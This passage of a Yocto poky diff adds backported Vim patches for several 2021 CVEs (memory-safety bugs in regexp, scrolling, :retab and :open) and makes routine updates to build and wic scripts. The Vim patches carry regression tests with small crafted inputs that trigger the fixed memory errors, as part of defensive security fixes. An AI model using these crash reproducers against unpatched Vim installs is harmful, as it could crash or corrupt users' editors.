++func Test_search_with_invalid_range() ++ new ++ let lines =<< trim END ++ /\%.v ++ 5/ ++ c ++ END ++ call writefile(lines, 'Xrangesearch') ++ source Xrangesearch ++ ++ bwipe! ++ call delete('Xrangesearch') ++endfunc ++ ++ ++" vim: shiftwidth=2 sts=2 expandtab +diff --git a/src/version.c b/src/version.c +index 2b5de5ccf..092864bbb 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3489, + /**/ + 3487, + /**/ diff --git a/poky/meta/recipes-support/vim/files/0005-patch-8.2.3564-invalid-memory-access-when-scrolling-.patch b/poky/meta/recipes-support/vim/files/0005-patch-8.2.3564-invalid-memory-access-when-scrolling-.patch new file mode 100644 index 0000000000..7184b37cad --- /dev/null +++ b/poky/meta/recipes-support/vim/files/0005-patch-8.2.3564-invalid-memory-access-when-scrolling-.patch @@ -0,0 +1,97 @@ +CVE: CVE-2021-3903 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From b15919c1fe0f7fc3d98ff5207ed2feb43c59009d Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar <Bram@vim.org> +Date: Mon, 25 Oct 2021 17:07:04 +0100 +Subject: [PATCH] patch 8.2.3564: invalid memory access when scrolling without + valid screen + +Problem: Invalid memory access when scrolling without a valid screen. +Solution: Do not set VALID_BOTLINE in w_valid. +--- + src/move.c | 1 - + src/testdir/test_normal.vim | 23 ++++++++++++++++++++--- + src/version.c | 2 ++ + 3 files changed, 22 insertions(+), 4 deletions(-) + +diff --git a/src/move.c b/src/move.c +index 8e53d8bcb..10165ef4d 100644 +--- a/src/move.c ++++ b/src/move.c +@@ -198,7 +198,6 @@ update_topline(void) + { + curwin->w_topline = curwin->w_cursor.lnum; + curwin->w_botline = curwin->w_topline; +- curwin->w_valid |= VALID_BOTLINE|VALID_BOTLINE_AP; + curwin->w_scbind_pos = 1; + return; + } +diff --git a/src/testdir/test_normal.vim b/src/testdir/test_normal.vim +index d45cf4159..ca87928f5 100644 +--- a/src/testdir/test_normal.vim ++++ b/src/testdir/test_normal.vim +@@ -33,14 +33,14 @@ func CountSpaces(type, ...) + else + silent exe "normal! `[v`]y" + endif +- let g:a=strlen(substitute(@@, '[^ ]', '', 'g')) ++ let g:a = strlen(substitute(@@, '[^ ]', '', 'g')) + let &selection = sel_save + let @@ = reg_save + endfunc + + func OpfuncDummy(type, ...) + " for testing operatorfunc +- let g:opt=&linebreak ++ let g:opt = &linebreak + + if a:0 " Invoked from Visual mode, use gv command. + silent exe "normal! gvy" +@@ -51,7 +51,7 @@ func OpfuncDummy(type, ...) + endif + " Create a new dummy window + new +- let g:bufnr=bufnr('%') ++ let g:bufnr = bufnr('%') + endfunc + + fun! Test_normal00_optrans() +@@ -718,6 +718,23 @@ func Test_normal17_z_scroll_hor2() + bw! + endfunc + ++ ++func Test_scroll_in_ex_mode() ++ " This was using invalid memory because w_botline was invalid. ++ let lines =<< trim END ++ diffsplit ++ norm os00( ++ call writefile(['done'], 'Xdone') ++ qa! ++ END ++ call writefile(lines, 'Xscript') ++ call assert_equal(1, RunVim([], [], '--clean -X -Z -e -s -S Xscript')) ++ call assert_equal(['done'], readfile('Xdone')) ++ ++ call delete('Xscript') ++ call delete('Xdone') ++endfunc ++ + func Test_normal18_z_fold() + " basic tests for foldopen/folddelete + if !has("folding") +diff --git a/src/version.c b/src/version.c +index 092864bbb..a9e8be0e7 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3564, + /**/ + 3489, + /**/ diff --git a/poky/meta/recipes-support/vim/files/CVE-2021-3778.patch b/poky/meta/recipes-support/vim/files/CVE-2021-3778.patch new file mode 100644 index 0000000000..5fa60f5340 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/CVE-2021-3778.patch @@ -0,0 +1,61 @@ +From 6d351cec5b97cb72b226d03bd727e453a235ed8d Mon Sep 17 00:00:00 2001 +From: Minjae Kim <flowergom@gmail.com> +Date: Sun, 26 Sep 2021 23:48:00 +0000 +Subject: [PATCH] patch 8.2.3409: reading beyond end of line with invalid utf-8 + character + +Problem: Reading beyond end of line with invalid utf-8 character. +Solution: Check for NUL when advancing. + +Upstream-Status: Accepted [https://github.com/vim/vim/commit/65b605665997fad54ef39a93199e305af2fe4d7f] +CVE: CVE-2021-3778 +Signed-off-by: Minjae Kim <flowergom@gmail.com> + +--- + src/regexp_nfa.c | 3 ++- + src/testdir/test_regexp_utf8.vim | 7 +++++++ + src/version.c | 2 ++ + 3 files changed, 11 insertions(+), 1 deletion(-) + +diff --git a/src/regexp_nfa.c b/src/regexp_nfa.c +index fb512f961..ace83a1a3 100644 +--- a/src/regexp_nfa.c ++++ b/src/regexp_nfa.c +@@ -5455,7 +5455,8 @@ find_match_text(colnr_T startcol, int regstart, char_u *match_text) + match = FALSE; + break; + } +- len2 += MB_CHAR2LEN(c2); ++ len2 += enc_utf8 ? utf_ptr2len(rex.line + col + len2) ++ : MB_CHAR2LEN(c2); + } + if (match + // check that no composing char follows +diff --git a/src/testdir/test_regexp_utf8.vim b/src/testdir/test_regexp_utf8.vim +index 19ff882be..e0665818b 100644 +--- a/src/testdir/test_regexp_utf8.vim ++++ b/src/testdir/test_regexp_utf8.vim +@@ -215,3 +215,10 @@ func Test_optmatch_toolong() + set re=0 + endfunc + ++func Test_match_invalid_byte() ++ call writefile(0z630a.765d30aa0a.2e0a.790a.4030, 'Xinvalid') ++ new ++ source Xinvalid ++ bwipe! ++ call delete('Xinvalid') ++endfunc +diff --git a/src/version.c b/src/version.c +index 8912f6215..85bdfc601 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3409, + /**/ + 3402, + /**/ diff --git a/poky/meta/recipes-support/vim/files/CVE-2021-4069.patch b/poky/meta/recipes-support/vim/files/CVE-2021-4069.patch new file mode 100644 index 0000000000..6a67281907 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/CVE-2021-4069.patch @@ -0,0 +1,43 @@ +From cd2422ee2dab3f33b2dbd1271e17cdaf8762b6d1 Mon Sep 17 00:00:00 2001 +From: Minjae Kim <flowergom@gmail.com> +Date: Fri, 17 Dec 2021 20:32:02 -0800 +Subject: [PATCH] using freed memory in open command + +Problem: Using freed memory in open command. +Solution: Make a copy of the current line. + +Upstream-Status: Backported [https://github.com/vim/vim/commit/e031fe90cf2e375ce861ff5e5e281e4ad229ebb9] +CVE: CVE-2021-4069 +Signed-off-by: Minjae Kim <flowergom@gmail.com> +--- + src/ex_docmd.c | 10 +++++++--- + 1 file changed, 7 insertions(+), 3 deletions(-) + +diff --git a/src/ex_docmd.c b/src/ex_docmd.c +index 59e245bee..ccd9e8bed 100644 +--- a/src/ex_docmd.c ++++ b/src/ex_docmd.c +@@ -6029,13 +6029,17 @@ ex_open(exarg_T *eap) + regmatch.regprog = vim_regcomp(eap->arg, p_magic ? RE_MAGIC : 0); + if (regmatch.regprog != NULL) + { ++ // make a copy of the line, when searching for a mark it might be ++ // flushed ++ char_u *line = vim_strsave(ml_get_curline()); ++ + regmatch.rm_ic = p_ic; +- p = ml_get_curline(); +- if (vim_regexec(®match, p, (colnr_T)0)) +- curwin->w_cursor.col = (colnr_T)(regmatch.startp[0] - p); ++ if (vim_regexec(®match, line, (colnr_T)0)) ++ curwin->w_cursor.col = (colnr_T)(regmatch.startp[0] - line); + else + emsg(_(e_nomatch)); + vim_regfree(regmatch.regprog); ++ vim_free(line); + } + // Move to the NUL, ignore any other arguments. + eap->arg += STRLEN(eap->arg); +-- +2.25.1 + diff --git a/poky/meta/recipes-support/vim/files/b7081e135a16091c93f6f5f7525a5c58fb7ca9f9.patch b/poky/meta/recipes-support/vim/files/b7081e135a16091c93f6f5f7525a5c58fb7ca9f9.patch new file mode 100644 index 0000000000..1cee759502 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/b7081e135a16091c93f6f5f7525a5c58fb7ca9f9.patch @@ -0,0 +1,207 @@ +From b7081e135a16091c93f6f5f7525a5c58fb7ca9f9 Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar <Bram@vim.org> +Date: Sat, 4 Sep 2021 18:47:28 +0200 +Subject: [PATCH] patch 8.2.3402: invalid memory access when using :retab with + large value + +Problem: Invalid memory access when using :retab with large value. +Solution: Check the number is positive. + +CVE: CVE-2021-3770 +Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> +Upstream-Status: Backport [https://github.com/vim/vim/commit/b7081e135a16091c93f6f5f7525a5c58fb7ca9f9] +--- + src/indent.c | 34 +++++++++++++++++++++------------- + src/option.c | 12 ++++++------ + src/optionstr.c | 4 ++-- + src/testdir/test_retab.vim | 3 +++ + src/version.c | 2 ++ + 5 files changed, 34 insertions(+), 21 deletions(-) + +Index: git/src/indent.c +=================================================================== +--- git.orig/src/indent.c ++++ git/src/indent.c +@@ -18,18 +18,19 @@ + /* + * Set the integer values corresponding to the string setting of 'vartabstop'. + * "array" will be set, caller must free it if needed. ++ * Return FAIL for an error. + */ + int + tabstop_set(char_u *var, int **array) + { +- int valcount = 1; +- int t; +- char_u *cp; ++ int valcount = 1; ++ int t; ++ char_u *cp; + + if (var[0] == NUL || (var[0] == '0' && var[1] == NUL)) + { + *array = NULL; +- return TRUE; ++ return OK; + } + + for (cp = var; *cp != NUL; ++cp) +@@ -43,8 +44,8 @@ tabstop_set(char_u *var, int **array) + if (cp != end) + emsg(_(e_positive)); + else +- emsg(_(e_invarg)); +- return FALSE; ++ semsg(_(e_invarg2), cp); ++ return FAIL; + } + } + +@@ -55,26 +56,33 @@ tabstop_set(char_u *var, int **array) + ++valcount; + continue; + } +- emsg(_(e_invarg)); +- return FALSE; ++ semsg(_(e_invarg2), var); ++ return FAIL; + } + + *array = ALLOC_MULT(int, valcount + 1); + if (*array == NULL) +- return FALSE; ++ return FAIL; + (*array)[0] = valcount; + + t = 1; + for (cp = var; *cp != NUL;) + { +- (*array)[t++] = atoi((char *)cp); +- while (*cp != NUL && *cp != ',') ++ int n = atoi((char *)cp); ++ ++ if (n < 0 || n > 9999) ++ { ++ semsg(_(e_invarg2), cp); ++ return FAIL; ++ } ++ (*array)[t++] = n; ++ while (*cp != NUL && *cp != ',') + ++cp; + if (*cp != NUL) + ++cp; + } + +- return TRUE; ++ return OK; + } + + /* +@@ -1556,7 +1564,7 @@ ex_retab(exarg_T *eap) + + #ifdef FEAT_VARTABS + new_ts_str = eap->arg; +- if (!tabstop_set(eap->arg, &new_vts_array)) ++ if (tabstop_set(eap->arg, &new_vts_array) == FAIL) + return; + while (vim_isdigit(*(eap->arg)) || *(eap->arg) == ',') + ++(eap->arg); +Index: git/src/option.c +=================================================================== +--- git.orig/src/option.c ++++ git/src/option.c +@@ -2292,9 +2292,9 @@ didset_options2(void) + #endif + #ifdef FEAT_VARTABS + vim_free(curbuf->b_p_vsts_array); +- tabstop_set(curbuf->b_p_vsts, &curbuf->b_p_vsts_array); ++ (void)tabstop_set(curbuf->b_p_vsts, &curbuf->b_p_vsts_array); + vim_free(curbuf->b_p_vts_array); +- tabstop_set(curbuf->b_p_vts, &curbuf->b_p_vts_array); ++ (void)tabstop_set(curbuf->b_p_vts, &curbuf->b_p_vts_array); + #endif + } + +@@ -5756,7 +5756,7 @@ buf_copy_options(buf_T *buf, int flags) + buf->b_p_vsts = vim_strsave(p_vsts); + COPY_OPT_SCTX(buf, BV_VSTS); + if (p_vsts && p_vsts != empty_option) +- tabstop_set(p_vsts, &buf->b_p_vsts_array); ++ (void)tabstop_set(p_vsts, &buf->b_p_vsts_array); + else + buf->b_p_vsts_array = 0; + buf->b_p_vsts_nopaste = p_vsts_nopaste +@@ -5914,7 +5914,7 @@ buf_copy_options(buf_T *buf, int flags) + buf->b_p_isk = save_p_isk; + #ifdef FEAT_VARTABS + if (p_vts && p_vts != empty_option && !buf->b_p_vts_array) +- tabstop_set(p_vts, &buf->b_p_vts_array); ++ (void)tabstop_set(p_vts, &buf->b_p_vts_array); + else + buf->b_p_vts_array = NULL; + #endif +@@ -5929,7 +5929,7 @@ buf_copy_options(buf_T *buf, int flags) + buf->b_p_vts = vim_strsave(p_vts); + COPY_OPT_SCTX(buf, BV_VTS); + if (p_vts && p_vts != empty_option && !buf->b_p_vts_array) +- tabstop_set(p_vts, &buf->b_p_vts_array); ++ (void)tabstop_set(p_vts, &buf->b_p_vts_array); + else + buf->b_p_vts_array = NULL; + #endif +@@ -6634,7 +6634,7 @@ paste_option_changed(void) + if (buf->b_p_vsts_array) + vim_free(buf->b_p_vsts_array); + if (buf->b_p_vsts && buf->b_p_vsts != empty_option) +- tabstop_set(buf->b_p_vsts, &buf->b_p_vsts_array); ++ (void)tabstop_set(buf->b_p_vsts, &buf->b_p_vsts_array); + else + buf->b_p_vsts_array = 0; + #endif +Index: git/src/optionstr.c +=================================================================== +--- git.orig/src/optionstr.c ++++ git/src/optionstr.c +@@ -2166,7 +2166,7 @@ did_set_string_option( + if (errmsg == NULL) + { + int *oldarray = curbuf->b_p_vsts_array; +- if (tabstop_set(*varp, &(curbuf->b_p_vsts_array))) ++ if (tabstop_set(*varp, &(curbuf->b_p_vsts_array)) == OK) + { + if (oldarray) + vim_free(oldarray); +@@ -2205,7 +2205,7 @@ did_set_string_option( + { + int *oldarray = curbuf->b_p_vts_array; + +- if (tabstop_set(*varp, &(curbuf->b_p_vts_array))) ++ if (tabstop_set(*varp, &(curbuf->b_p_vts_array)) == OK) + { + vim_free(oldarray); + #ifdef FEAT_FOLDING +Index: git/src/testdir/test_retab.vim +=================================================================== +--- git.orig/src/testdir/test_retab.vim ++++ git/src/testdir/test_retab.vim +@@ -74,4 +74,7 @@ endfunc + func Test_retab_error() + call assert_fails('retab -1', 'E487:') + call assert_fails('retab! -1', 'E487:') ++ call assert_fails('ret -1000', 'E487:') ++ call assert_fails('ret 10000', 'E475:') ++ call assert_fails('ret 80000000000000000000', 'E475:') + endfunc +Index: git/src/version.c +=================================================================== +--- git.orig/src/version.c ++++ git/src/version.c +@@ -743,6 +743,8 @@ static char *(features[]) = + static int included_patches[] = + { /* Add new patch number below this line */ + /**/ ++ 3402, ++/**/ + 0 + }; + diff --git a/poky/meta/recipes-support/vim/vim.inc b/poky/meta/recipes-support/vim/vim.inc index 878d0f18ae..51a6861325 100644 --- a/poky/meta/recipes-support/vim/vim.inc +++ b/poky/meta/recipes-support/vim/vim.inc @@ -11,18 +11,32 @@ RSUGGESTS_${PN} = "diffutils" LICENSE = "vim" LIC_FILES_CHKSUM = "file://runtime/doc/uganda.txt;endline=287;md5=a19edd7ec70d573a005d9e509375a99a" -SRC_URI = "git://github.com/vim/vim.git \ +SRC_URI = "git://github.com/vim/vim.git;branch=master;protocol=https \ file://disable_acl_header_check.patch \ file://vim-add-knob-whether-elf.h-are-checked.patch \ file://0001-src-Makefile-improve-reproducibility.patch \ file://no-path-adjust.patch \ file://racefix.patch \ -" + file://b7081e135a16091c93f6f5f7525a5c58fb7ca9f9.patch \ + file://CVE-2021-3778.patch \ + file://0002-patch-8.2.3428-using-freed-memory-when-replacing.patch \ + file://0003-patch-8.2.3487-illegal-memory-access-if-buffer-name-.patch \ + file://0004-patch-8.2.3489-ml_get-error-after-search-with-range.patch \ + file://0005-patch-8.2.3564-invalid-memory-access-when-scrolling-.patch \ + file://0001-patch-8.2.3581-reading-character-past-end-of-line.patch \ + file://0002-patch-8.2.3582-reading-uninitialized-memory-when-giv.patch \ + file://0002-patch-8.2.3611-crash-when-using-CTRL-W-f-without-fin.patch \ + file://CVE-2021-4069.patch \ + " + SRCREV = "98056533b96b6b5d8849641de93185dd7bcadc44" # Do not consider .z in x.y.z, as that is updated with every commit UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+)\.0" +# CVE-2021-3968 is related to an issue which was introduced after 8.2, this can be removed after 8.3. +CVE_CHECK_WHITELIST += "CVE-2021-3968" + S = "${WORKDIR}/git" VIMDIR = "vim${@d.getVar('PV').split('.')[0]}${@d.getVar('PV').split('.')[1]}" @@ -54,11 +68,12 @@ do_compile() { autotools_do_compile } -#Available PACKAGECONFIG options are gtkgui, acl, x11, tiny +#Available PACKAGECONFIG options are gtkgui, acl, x11, tiny selinux, elfutils, nls PACKAGECONFIG ??= "" PACKAGECONFIG += " \ ${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)} \ ${@bb.utils.contains('DISTRO_FEATURES', 'x11', 'x11 gtkgui', '', d)} \ + nls \ " PACKAGECONFIG[gtkgui] = "--enable-gui=gtk3,--enable-gui=no,gtk+3" @@ -67,6 +82,7 @@ PACKAGECONFIG[x11] = "--with-x,--without-x,xt," PACKAGECONFIG[tiny] = "--with-features=tiny,--with-features=big,," PACKAGECONFIG[selinux] = "--enable-selinux,--disable-selinux,libselinux," PACKAGECONFIG[elfutils] = "--enable-elf-check,,elfutils," +PACKAGECONFIG[nls] = "--enable-nls,--disable-nls,," EXTRA_OECONF = " \ --disable-gpm \ diff --git a/poky/scripts/buildhistory-diff b/poky/scripts/buildhistory-diff index 833f7c33a5..02eedafd6e 100755 --- a/poky/scripts/buildhistory-diff +++ b/poky/scripts/buildhistory-diff @@ -11,7 +11,6 @@ import sys import os import argparse -from distutils.version import LooseVersion # Ensure PythonGit is installed (buildhistory_analysis needs it) try: @@ -71,10 +70,6 @@ def main(): parser = get_args_parser() args = parser.parse_args() - if LooseVersion(git.__version__) < '0.3.1': - sys.stderr.write("Version of GitPython is too old, please install GitPython (python-git) 0.3.1 or later in order to use this script\n") - sys.exit(1) - if len(args.revisions) > 2: sys.stderr.write('Invalid argument(s) specified: %s\n\n' % ' '.join(args.revisions[2:])) parser.print_help() diff --git a/poky/scripts/contrib/convert-srcuri.py b/poky/scripts/contrib/convert-srcuri.py new file mode 100755 index 0000000000..5b362ea2e8 --- /dev/null +++ b/poky/scripts/contrib/convert-srcuri.py @@ -0,0 +1,77 @@ +#!/usr/bin/env python3 +# +# Conversion script to update SRC_URI to add branch to git urls +# +# Copyright (C) 2021 Richard Purdie +# +# SPDX-License-Identifier: GPL-2.0-only +# + +import re +import os +import sys +import tempfile +import shutil +import mimetypes + +if len(sys.argv) < 2: + print("Please specify a directory to run the conversion script against.") + sys.exit(1) + +def processfile(fn): + def matchline(line): + if "MIRROR" in line or ".*" in line or "GNOME_GIT" in line: + return False + return True + print("processing file '%s'" % fn) + try: + if "distro_alias.inc" in fn or "linux-yocto-custom.bb" in fn: + return + fh, abs_path = tempfile.mkstemp() + modified = False + with os.fdopen(fh, 'w') as new_file: + with open(fn, "r") as old_file: + for line in old_file: + if ("git://" in line or "gitsm://" in line) and "branch=" not in line and matchline(line): + if line.endswith('"\n'): + line = line.replace('"\n', ';branch=master"\n') + elif line.endswith(" \\\n"): + line = line.replace(' \\\n', ';branch=master \\\n') + modified = True + if ("git://" in line or "gitsm://" in line) and "github.com" in line and "protocol=https" not in line and matchline(line): + if "protocol=git" in line: + line = line.replace('protocol=git', 'protocol=https') + elif line.endswith('"\n'): + line = line.replace('"\n', ';protocol=https"\n') + elif line.endswith(" \\\n"): + line = line.replace(' \\\n', ';protocol=https \\\n') + modified = True + new_file.write(line) + if modified: + shutil.copymode(fn, abs_path) + os.remove(fn) + shutil.move(abs_path, fn) + except UnicodeDecodeError: + pass + +ourname = os.path.basename(sys.argv[0]) +ourversion = "0.1" + +if os.path.isfile(sys.argv[1]): + processfile(sys.argv[1]) + sys.exit(0) + +for targetdir in sys.argv[1:]: + print("processing directory '%s'" % targetdir) + for root, dirs, files in os.walk(targetdir): + for name in files: + if name == ourname: + continue + fn = os.path.join(root, name) + if os.path.islink(fn): + continue + if "/.git/" in fn or fn.endswith(".html") or fn.endswith(".patch") or fn.endswith(".m4") or fn.endswith(".diff"): + continue + processfile(fn) + +print("All files processed with version %s" % ourversion) diff --git a/poky/scripts/lib/checklayer/cases/common.py b/poky/scripts/lib/checklayer/cases/common.py index b82304e361..4495f71b24 100644 --- a/poky/scripts/lib/checklayer/cases/common.py +++ b/poky/scripts/lib/checklayer/cases/common.py @@ -14,7 +14,7 @@ class CommonCheckLayer(OECheckLayerTestCase): # The top-level README file may have a suffix (like README.rst or README.txt). readme_files = glob.glob(os.path.join(self.tc.layer['path'], '[Rr][Ee][Aa][Dd][Mm][Ee]*')) self.assertTrue(len(readme_files) > 0, - msg="Layer doesn't contains README file.") + msg="Layer doesn't contain a README file.") # There might be more than one file matching the file pattern above # (for example, README.rst and README-COPYING.rst). The one with the shortest diff --git a/poky/scripts/lib/recipetool/create.py b/poky/scripts/lib/recipetool/create.py index 566c75369a..5b6ac12a92 100644 --- a/poky/scripts/lib/recipetool/create.py +++ b/poky/scripts/lib/recipetool/create.py @@ -478,6 +478,9 @@ def create_recipe(args): storeTagName = params['tag'] params['nobranch'] = '1' del params['tag'] + # Assume 'master' branch if not set + if scheme in ['git', 'gitsm'] and 'branch' not in params and 'nobranch' not in params: + params['branch'] = 'master' fetchuri = bb.fetch2.encodeurl((scheme, network, path, user, passwd, params)) tmpparent = tinfoil.config_data.getVar('BASE_WORKDIR') @@ -527,10 +530,9 @@ def create_recipe(args): # Remove HEAD reference point and drop remote prefix get_branch = [x.split('/', 1)[1] for x in get_branch if not x.startswith('origin/HEAD')] if 'master' in get_branch: - # If it is master, we do not need to append 'branch=master' as this is default. # Even with the case where get_branch has multiple objects, if 'master' is one # of them, we should default take from 'master' - srcbranch = '' + srcbranch = 'master' elif len(get_branch) == 1: # If 'master' isn't in get_branch and get_branch contains only ONE object, then store result into 'srcbranch' srcbranch = get_branch[0] @@ -543,8 +545,8 @@ def create_recipe(args): # Since we might have a value in srcbranch, we need to # recontruct the srcuri to include 'branch' in params. scheme, network, path, user, passwd, params = bb.fetch2.decodeurl(srcuri) - if srcbranch: - params['branch'] = srcbranch + if scheme in ['git', 'gitsm']: + params['branch'] = srcbranch or 'master' if storeTagName and scheme in ['git', 'gitsm']: # Check srcrev using tag and check validity of the tag @@ -603,7 +605,7 @@ def create_recipe(args): splitline = line.split() if len(splitline) > 1: if splitline[0] == 'origin' and scriptutils.is_src_url(splitline[1]): - srcuri = reformat_git_uri(splitline[1]) + srcuri = reformat_git_uri(splitline[1]) + ';branch=master' srcsubdir = 'git' break diff --git a/poky/scripts/lib/scriptutils.py b/poky/scripts/lib/scriptutils.py index f92255d8dc..47a08194d0 100644 --- a/poky/scripts/lib/scriptutils.py +++ b/poky/scripts/lib/scriptutils.py @@ -18,7 +18,8 @@ import sys import tempfile import threading import importlib -from importlib import machinery +import importlib.machinery +import importlib.util class KeepAliveStreamHandler(logging.StreamHandler): def __init__(self, keepalive=True, **kwargs): @@ -82,7 +83,9 @@ def load_plugins(logger, plugins, pluginpath): logger.debug('Loading plugin %s' % name) spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] ) if spec: - return spec.loader.load_module() + mod = importlib.util.module_from_spec(spec) + spec.loader.exec_module(mod) + return mod def plugin_name(filename): return os.path.splitext(os.path.basename(filename))[0] @@ -215,7 +218,8 @@ def fetch_url(tinfoil, srcuri, srcrev, destdir, logger, preserve_tmp=False, mirr pathvars = ['T', 'RECIPE_SYSROOT', 'RECIPE_SYSROOT_NATIVE'] for pathvar in pathvars: path = rd.getVar(pathvar) - shutil.rmtree(path) + if os.path.exists(path): + shutil.rmtree(path) finally: if fetchrecipe: try: diff --git a/poky/scripts/lib/wic/engine.py b/poky/scripts/lib/wic/engine.py index 9ff4394757..7dbde85696 100644 --- a/poky/scripts/lib/wic/engine.py +++ b/poky/scripts/lib/wic/engine.py @@ -19,10 +19,10 @@ import os import tempfile import json import subprocess +import shutil import re from collections import namedtuple, OrderedDict -from distutils.spawn import find_executable from wic import WicError from wic.filemap import sparse_copy @@ -245,7 +245,7 @@ class Disk: for path in pathlist.split(':'): self.paths = "%s%s:%s" % (native_sysroot, path, self.paths) - self.parted = find_executable("parted", self.paths) + self.parted = shutil.which("parted", path=self.paths) if not self.parted: raise WicError("Can't find executable parted") @@ -283,7 +283,7 @@ class Disk: "resize2fs", "mkswap", "mkdosfs", "debugfs"): aname = "_%s" % name if aname not in self.__dict__: - setattr(self, aname, find_executable(name, self.paths)) + setattr(self, aname, shutil.which(name, path=self.paths)) if aname not in self.__dict__ or self.__dict__[aname] is None: raise WicError("Can't find executable '{}'".format(name)) return self.__dict__[aname] diff --git a/poky/scripts/lib/wic/help.py b/poky/scripts/lib/wic/help.py index 62a2a90e79..fcace95ff4 100644 --- a/poky/scripts/lib/wic/help.py +++ b/poky/scripts/lib/wic/help.py @@ -840,8 +840,8 @@ DESCRIPTION meanings. The commands are based on the Fedora kickstart documentation but with modifications to reflect wic capabilities. - http://fedoraproject.org/wiki/Anaconda/Kickstart#part_or_partition - http://fedoraproject.org/wiki/Anaconda/Kickstart#bootloader + https://pykickstart.readthedocs.io/en/latest/kickstart-docs.html#part-or-partition + https://pykickstart.readthedocs.io/en/latest/kickstart-docs.html#bootloader Commands diff --git a/poky/scripts/lib/wic/misc.py b/poky/scripts/lib/wic/misc.py index 8fb508dd39..3e11822996 100644 --- a/poky/scripts/lib/wic/misc.py +++ b/poky/scripts/lib/wic/misc.py @@ -16,9 +16,9 @@ import logging import os import re import subprocess +import shutil from collections import defaultdict -from distutils import spawn from wic import WicError @@ -46,7 +46,8 @@ NATIVE_RECIPES = {"bmaptool": "bmap-tools", "parted": "parted", "sfdisk": "util-linux", "sgdisk": "gptfdisk", - "syslinux": "syslinux" + "syslinux": "syslinux", + "tar": "tar" } def runtool(cmdln_or_args): @@ -113,6 +114,15 @@ def exec_cmd(cmd_and_args, as_shell=False): """ return _exec_cmd(cmd_and_args, as_shell)[1] +def find_executable(cmd, paths): + recipe = cmd + if recipe in NATIVE_RECIPES: + recipe = NATIVE_RECIPES[recipe] + provided = get_bitbake_var("ASSUME_PROVIDED") + if provided and "%s-native" % recipe in provided: + return True + + return shutil.which(cmd, path=paths) def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""): """ @@ -141,7 +151,7 @@ def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""): logger.debug("exec_native_cmd: %s", native_cmd_and_args) # If the command isn't in the native sysroot say we failed. - if spawn.find_executable(args[0], native_paths): + if find_executable(args[0], native_paths): ret, out = _exec_cmd(native_cmd_and_args, True) else: ret = 127 diff --git a/poky/scripts/lib/wic/partition.py b/poky/scripts/lib/wic/partition.py index 85f9847047..792bb3dcd3 100644 --- a/poky/scripts/lib/wic/partition.py +++ b/poky/scripts/lib/wic/partition.py @@ -104,7 +104,7 @@ class Partition(): extra_blocks = self.extra_space rootfs_size = actual_rootfs_size + extra_blocks - rootfs_size *= self.overhead_factor + rootfs_size = int(rootfs_size * self.overhead_factor) logger.debug("Added %d extra blocks to %s to get to %d total blocks", extra_blocks, self.mountpoint, rootfs_size) diff --git a/poky/scripts/lib/wic/pluginbase.py b/poky/scripts/lib/wic/pluginbase.py index d9b4e57747..b64568339b 100644 --- a/poky/scripts/lib/wic/pluginbase.py +++ b/poky/scripts/lib/wic/pluginbase.py @@ -9,9 +9,11 @@ __all__ = ['ImagerPlugin', 'SourcePlugin'] import os import logging +import types from collections import defaultdict -from importlib.machinery import SourceFileLoader +import importlib +import importlib.util from wic import WicError from wic.misc import get_bitbake_var @@ -54,7 +56,9 @@ class PluginMgr: mname = fname[:-3] mpath = os.path.join(ppath, fname) logger.debug("loading plugin module %s", mpath) - SourceFileLoader(mname, mpath).load_module() + spec = importlib.util.spec_from_file_location(mname, mpath) + module = importlib.util.module_from_spec(spec) + spec.loader.exec_module(module) return PLUGINS.get(ptype) diff --git a/poky/scripts/lib/wic/plugins/imager/direct.py b/poky/scripts/lib/wic/plugins/imager/direct.py index 7e1c1c03ab..2505c13fce 100644 --- a/poky/scripts/lib/wic/plugins/imager/direct.py +++ b/poky/scripts/lib/wic/plugins/imager/direct.py @@ -115,7 +115,7 @@ class DirectPlugin(ImagerPlugin): updated = False for part in self.parts: if not part.realnum or not part.mountpoint \ - or part.mountpoint == "/": + or part.mountpoint == "/" or not part.mountpoint.startswith('/'): continue if part.use_uuid: diff --git a/poky/scripts/lib/wic/plugins/source/bootimg-pcbios.py b/poky/scripts/lib/wic/plugins/source/bootimg-pcbios.py index f2639e7004..32e47f1831 100644 --- a/poky/scripts/lib/wic/plugins/source/bootimg-pcbios.py +++ b/poky/scripts/lib/wic/plugins/source/bootimg-pcbios.py @@ -186,8 +186,10 @@ class BootimgPcbiosPlugin(SourcePlugin): # dosfs image, created by mkdosfs bootimg = "%s/boot%s.img" % (cr_workdir, part.lineno) - dosfs_cmd = "mkdosfs -n boot -i %s -S 512 -C %s %d" % \ - (part.fsuuid, bootimg, blocks) + label = part.label if part.label else "boot" + + dosfs_cmd = "mkdosfs -n %s -i %s -S 512 -C %s %d" % \ + (label, part.fsuuid, bootimg, blocks) exec_native_cmd(dosfs_cmd, native_sysroot) mcopy_cmd = "mcopy -i %s -s %s/* ::/" % (bootimg, hdddir) diff --git a/poky/scripts/oe-pkgdata-browser b/poky/scripts/oe-pkgdata-browser index 8d223185a4..65a6ee956e 100755 --- a/poky/scripts/oe-pkgdata-browser +++ b/poky/scripts/oe-pkgdata-browser @@ -236,6 +236,8 @@ class PkgUi(): update_deps("RPROVIDES", "Provides: ", self.provides_label, clickable=False) def load_recipes(self): + if not os.path.exists(pkgdata): + sys.exit("Error: Please ensure %s exists by generating packages before using this tool." % pkgdata) for recipe in sorted(os.listdir(pkgdata)): if os.path.isfile(os.path.join(pkgdata, recipe)): 